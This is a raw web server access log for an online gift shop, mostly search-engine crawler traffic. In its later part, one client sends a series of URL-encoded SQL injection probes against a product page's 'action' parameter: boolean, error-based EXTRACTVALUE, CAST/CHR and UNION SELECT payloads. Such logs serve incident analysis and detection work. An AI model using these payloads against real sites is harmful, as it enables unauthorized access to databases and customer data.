185.191.171.13 - - [17/Jul/2022:19:11:09 +0200] "GET /seagrass-basket-30-cm-p-50217.html HTTP/1.0" 301 74181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [17/Jul/2022:19:11:13 +0200] "GET /seagrass-basket-p-50217.html HTTP/1.0" 200 74099 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.36.148.131 - - [17/Jul/2022:19:12:34 +0200] "GET /jewelry-holder-flower-dress-p-47489.html HTTP/1.0" 200 74278 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
114.119.137.252 - - [17/Jul/2022:19:12:46 +0200] "GET /gorjuss-fiesta-triple-pocket-rucksack-love-grows-p-52373.html HTTP/1.0" 200 75450 "http://www.wonder-geek.com/backpacks-c-31_77.html?page=6" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
207.46.13.169 - - [17/Jul/2022:19:13:10 +0200] "GET /images/5010065082236.jpg HTTP/1.0" 200 259 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.191.171.24 - - [17/Jul/2022:19:13:13 +0200] "GET /large-hanging-clock-retro-metal-wood-p-51997.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.70.92 - - [17/Jul/2022:19:13:19 +0200] "GET /chiloe-bedclothes-p-54666.html HTTP/1.0" 200 74778 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.37 - - [17/Jul/2022:19:13:45 +0200] "GET /gorjuss-lockable-trinket-box-tall-tails-p-46953.html HTTP/1.0" 301 71556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.40 - - [17/Jul/2022:19:13:48 +0200] "GET /-p-46953.html HTTP/1.0" 200 71489 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [17/Jul/2022:19:14:06 +0200] "GET /glitters-green-p-53396.html HTTP/1.0" 200 74088 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [17/Jul/2022:19:14:08 +0200] "GET /poster-p-30862.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [17/Jul/2022:19:14:18 +0200] "GET /gogh-nuit-toile-adult-apron-p-47665.html HTTP/1.0" 200 74762 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.36.149.40 - - [17/Jul/2022:19:14:37 +0200] "GET /coca-cola-large-metal-plate-deco-p-27959.html HTTP/1.0" 200 74192 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.33 - - [17/Jul/2022:19:14:39 +0200] "GET /votive-candle-rose-p-42630.html HTTP/1.0" 200 74729 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.36.148.150 - - [17/Jul/2022:19:14:46 +0200] "GET /images/big_prod/4036113231914.jpg HTTP/1.0" 200 268 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
23.100.232.233 - - [17/Jul/2022:19:14:57 +0200] "GET /crayola-set-of-14-poster-paints-p-16652.html HTTP/1.0" 301 74435 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:14:58 +0200] "GET /crayola-poster-paints-p-16652.html HTTP/1.0" 200 74347 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:00 +0200] "GET /templates/Pixame_v1/stylesheet.css HTTP/1.0" 200 267 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:00 +0200] "GET /highslide/highslide.js HTTP/1.0" 200 262 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:00 +0200] "GET /js/jquery.js HTTP/1.0" 200 252 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:01 +0200] "GET /js/jquery.jqzoom.js HTTP/1.0" 200 259 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:01 +0200] "GET /mondial_relay/js/jquery-1.3.2.min.js HTTP/1.0" 200 276 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:01 +0200] "GET /swfobject.js HTTP/1.0" 404 1308 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:01 +0200] "GET /style.ie7.css HTTP/1.0" 404 1308 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:02 +0200] "GET /templates/Pixame_v1/images/flash.swf HTTP/1.0" 200 290 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:02 +0200] "GET /highslide/graphics/zoomin.cur HTTP/1.0" 200 614 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
23.100.232.233 - - [17/Jul/2022:19:15:03 +0200] "GET /highslide/graphics/zoomout.cur HTTP/1.0" 200 614 "http://www.wonder-geek.com/crayola-poster-paints-p-16652.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)"
207.46.13.146 - - [17/Jul/2022:19:15:07 +0200] "GET /images/big_prod/8718317653148.jpg HTTP/1.0" 200 268 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.191.171.39 - - [17/Jul/2022:19:16:28 +0200] "GET /chien-lchant-p-49543.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.36.149.90 - - [17/Jul/2022:19:17:06 +0200] "GET /simpsons-shirt-p-29593.html HTTP/1.0" 200 75504 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.149 - - [17/Jul/2022:19:17:09 +0200] "GET /images/4025055092929.jpg HTTP/1.0" 200 259 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.44 - - [17/Jul/2022:19:17:18 +0200] "GET /elephant-golden-encrusted-mirrors-statuette-p-35429.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.36.148.34 - - [17/Jul/2022:19:17:19 +0200] "GET /choupi-small-backpack-p-27478.html HTTP/1.0" 301 71556 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
40.77.167.58 - - [17/Jul/2022:19:17:48 +0200] "GET /images/1341689750626.jpg HTTP/1.0" 200 259 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.191.171.40 - - [17/Jul/2022:19:17:58 +0200] "GET /espresso-set-humor-p-46259.html HTTP/1.0" 301 74182 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [17/Jul/2022:19:18:01 +0200] "GET /espresso-humor-p-46259.html HTTP/1.0" 200 74101 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
131.107.174.172 - - [17/Jul/2022:19:18:06 +0200] "GET /images/mini_prod/CADRE-LOUIS-PHILIPPES-01.jpg HTTP/1.0" 200 280 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
185.191.171.17 - - [17/Jul/2022:19:18:13 +0200] "GET /-p-42550.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [17/Jul/2022:19:18:49 +0200] "GET /embroidered-rectangular-tablecloth-kolam-140-140-cm-p-44466.html HTTP/1.0" 301 71772 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [17/Jul/2022:19:18:52 +0200] "GET /embroidered-rectangular-tablecloth-kolam-p-44466.html HTTP/1.0" 200 71665 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [17/Jul/2022:19:18:55 +0200] "GET /miss-mindy-dear-unicorn-light-figurine-p-46252.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
121.30.179.56 - - [17/Jul/2022:19:19:19 +0200] "GET /images/big_prod_1/5415203904171b.jpg HTTP/1.0" 200 271 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
66.249.70.88 - - [17/Jul/2022:19:19:19 +0200] "GET /girls/jackets-coats-parkas/hello-kitty-rainwear-with-his-backpack-p-4970.html HTTP/1.0" 301 71553 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.5 - - [17/Jul/2022:19:19:19 +0200] "GET /kimmi-junior-meika-pocket-mirror-p-15846.html HTTP/1.0" 200 77210 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.70.92 - - [17/Jul/2022:19:19:21 +0200] "GET /-p-4970.html HTTP/1.0" 200 71487 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.36.148.83 - - [17/Jul/2022:19:19:23 +0200] "GET /mandala-coasters-p-54070.html HTTP/1.0" 200 74127 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.42 - - [17/Jul/2022:19:20:25 +0200] "GET /marnie-ceramic-butter-dish-p-56562.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
147.92.153.16 - - [17/Jul/2022:19:20:31 +0200] "GET /images/big_prod/8422041720204C.jpg HTTP/1.0" 200 269 "-" "Mozilla/5.0 (compatible; Linespider/1.1; +https://lin.ee/4dwXkTH)"
185.191.171.21 - - [17/Jul/2022:19:20:29 +0200] "GET /brnice-lampshade-p-57963.html HTTP/1.0" 200 74938 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:20:40 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1&products_id=56950 HTTP/1.0" 302 492 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:20:42 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1&products_id=56950 HTTP/1.0" 302 492 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:20:42 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%28%29.%29%2C%22%29%28%27&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75056 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:21:04 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27UWpKIg%3C%27%22%3EFvlfua&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75055 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
54.36.149.2 - - [17/Jul/2022:19:21:23 +0200] "GET /betty-boop-bowl-p-6851.html HTTP/1.0" 301 71553 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
193.29.13.243 - - [17/Jul/2022:19:21:33 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%203152%3D3635%20AND%20%283703%3D3703&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75074 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
54.36.148.207 - - [17/Jul/2022:19:21:39 +0200] "GET /allen-decorated-cotton-adult-apron-p-58294.html HTTP/1.0" 200 74244 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.10 - - [17/Jul/2022:19:21:49 +0200] "GET /home-decoration-c-13.html?page=151 HTTP/1.0" 200 93218 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:21:57 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%207037%3D7037%20AND%20%287424%3D7424&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75074 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.16 - - [17/Jul/2022:19:22:03 +0200] "GET /elmer-toddler-flatware-p-4016.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
40.77.167.58 - - [17/Jul/2022:19:22:08 +0200] "GET /images/big_prod_1/5051276219653.jpg HTTP/1.0" 200 270 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
193.29.13.243 - - [17/Jul/2022:19:22:14 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%202694%3D2062&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75048 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.14 - - [17/Jul/2022:19:22:21 +0200] "GET /-p-37822.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:22:35 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%207037%3D7037&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75048 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.1 - - [17/Jul/2022:19:22:36 +0200] "GET /heart-home-spices-cranberry-candle-metal-p-57115.html HTTP/1.0" 200 75492 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:22:52 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%205430%3D5943%20AND%20%28%27vYJN%27%3D%27vYJN&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75086 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
216.244.66.242 - - [17/Jul/2022:19:23:05 +0200] "GET /robots.txt HTTP/1.0" 301 531 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.242 - - [17/Jul/2022:19:23:05 +0200] "GET /robots.txt HTTP/1.0" 200 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.242 - - [17/Jul/2022:19:23:05 +0200] "GET /robots.txt HTTP/1.0" 200 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
193.29.13.243 - - [17/Jul/2022:19:23:07 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%207037%3D7037%20AND%20%28%27qRsg%27%3D%27qRsg&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75086 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.10 - - [17/Jul/2022:19:23:10 +0200] "GET /volkswagen-p-40283.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:23:12 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%205135%3D7326%20AND%20%27WBrW%27%3D%27WBrW&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75080 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:23:19 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%207037%3D7037%20AND%20%27roEr%27%3D%27roEr&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75080 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
207.46.13.23 - - [17/Jul/2022:19:23:23 +0200] "GET /images/mini_prod/3438100317815.gif HTTP/1.0" 200 268 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
193.29.13.243 - - [17/Jul/2022:19:23:25 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%204495%3D1657--%20spnK&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75057 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.34 - - [17/Jul/2022:19:23:30 +0200] "GET /led-bunny-nightlight-p-53138.html HTTP/1.0" 301 75428 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:23:32 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%207037%3D7037--%20gjne&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75057 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.9 - - [17/Jul/2022:19:23:33 +0200] "GET /bunny-nightlight-p-53138.html HTTP/1.0" 200 75345 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:23:37 +0200] "GET /moki-bedspread-gray-p-56950.html?action=%28SELECT%20%28CASE%20WHEN%20%286006%3D9921%29%20THEN%20%27add_product%27%20ELSE%20%28SELECT%209921%20UNION%20SELECT%202016%29%20END%29%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75155 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:23:44 +0200] "GET /moki-bedspread-gray-p-56950.html?action=%28SELECT%20%28CASE%20WHEN%20%285549%3D5549%29%20THEN%20%27add_product%27%20ELSE%20%28SELECT%204423%20UNION%20SELECT%202452%29%20END%29%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75155 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:23:49 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%20EXTRACTVALUE%284314%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%284314%3D4314%2C1%29%29%29%2C0x71716b6a71%29%29%20AND%20%288069%3D8069&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75182 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:23:52 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%20EXTRACTVALUE%284314%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%284314%3D4314%2C1%29%29%29%2C0x71716b6a71%29%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75156 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:23:56 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%20EXTRACTVALUE%284314%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%284314%3D4314%2C1%29%29%29%2C0x71716b6a71%29%29%20AND%20%28%27DNdZ%27%3D%27DNdZ&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75194 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.25 - - [17/Jul/2022:19:23:57 +0200] "GET /atlas-statue-22-cm-p-40913.html HTTP/1.0" 301 74216 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:23:59 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%20EXTRACTVALUE%284314%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%284314%3D4314%2C1%29%29%29%2C0x71716b6a71%29%29%20AND%20%27zIXD%27%3D%27zIXD&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75188 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.42 - - [17/Jul/2022:19:24:01 +0200] "GET /atlas-statue-p-40913.html HTTP/1.0" 200 74137 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:24:03 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%20EXTRACTVALUE%284314%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%284314%3D4314%2C1%29%29%29%2C0x71716b6a71%29%29--%20ZPxk&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75165 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:07 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%204498%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284498%3D4498%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%285337%3D5337&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75376 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.21 - - [17/Jul/2022:19:24:09 +0200] "GET /tassen-mood-vase-made-germany-p-46335.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:24:11 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%204498%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284498%3D4498%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75350 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
54.36.149.44 - - [17/Jul/2022:19:24:14 +0200] "GET /little-buddha-collection-statuette-p-53289.html HTTP/1.0" 200 74271 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.6 - - [17/Jul/2022:19:24:15 +0200] "GET /ceramic-incense-burner-p-58428.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.36.149.103 - - [17/Jul/2022:19:24:16 +0200] "GET /images/big_prod/9316188086653.jpg HTTP/1.0" 200 268 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
193.29.13.243 - - [17/Jul/2022:19:24:15 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%204498%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284498%3D4498%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27tpWG%27%3D%27tpWG&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75388 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:20 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%204498%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284498%3D4498%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27nfIR%27%3D%27nfIR&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75382 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:24 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%204498%3DCAST%28%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284498%3D4498%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20ERze&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75359 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:27 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%201759%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281759%3D1759%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%283462%3D3462&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75357 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
